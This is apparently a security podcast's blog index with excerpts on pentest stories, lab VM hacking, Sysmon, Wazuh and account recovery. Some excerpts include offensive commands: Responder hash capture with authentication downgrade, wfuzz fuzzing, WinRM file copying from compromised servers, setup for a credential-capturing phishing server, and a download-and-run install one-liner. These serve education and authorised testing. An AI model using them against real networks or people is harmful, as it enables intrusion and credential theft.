Blog
Search all our posts or browse some of our most recent entries below:
7MS #592: 7 Steps to Recover Your Hacked Facebook Account
Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:Ask Facebook for help (good luck with that)Put out an SOS on your socialsFlag down the FBICall the cops!Grumble to your attorney generalHave patienceLock it down (once you get the account back)!Also, I have to say that this article was a fantastic resource in helping me [...]
7MS #591: Tales of Pentest Pwnage – Part 52
Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller. Let's [...]
7MS #590: Hacking Billy Madison – Part 2
Today my Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things:You can fuzz a URL with a specific file type using a format like this:wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.capTo rip .cap files apart and make them "pretty" you can use tpick:tcpick -C -yP -r tcp_dump.pcapOr tcpflow:apt install tcpflowtcpflow -rTo do port knocking, you can use the [...]
7MS #589: Tales of Pentest Pwnage – Part 51
In today's tale of pentest pwnage we talk about:The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructureCopying files via WinRM when copying over SMB is blocked:$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *...then provide your creds...and then:copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sessIf you come across PowerShell code that crafts a secure string [...]
7MS #588: Becoming a Sysmon Sensei with Amanda Berlin
Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one.Careful if you are are running sysmon on non-SSD drives - the intense [...]
7MS #587: Hacking Billy Madison
Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!
7MS #586: DIY Pentest Dropbox Tips – Part 8
Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. [...]
7MS #585: DIY Pentest Dropbox Tips – Part 7
Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create *fully automated* Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points: * When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login [...]
7MS #584: Tales of Pentest Pwnage – Part 50
In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.
7MS #583: Cred-Capturing Phishing with Caddy Server
Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create [...]
7MS #582: Using Wazuh as a SIEM for Work and Home
Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck. This one-liner will literally get Wazuh installed in about 5 minutes: curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a P.S. if you accidentally close your command window before writing down the admin password (like I did), you can [...]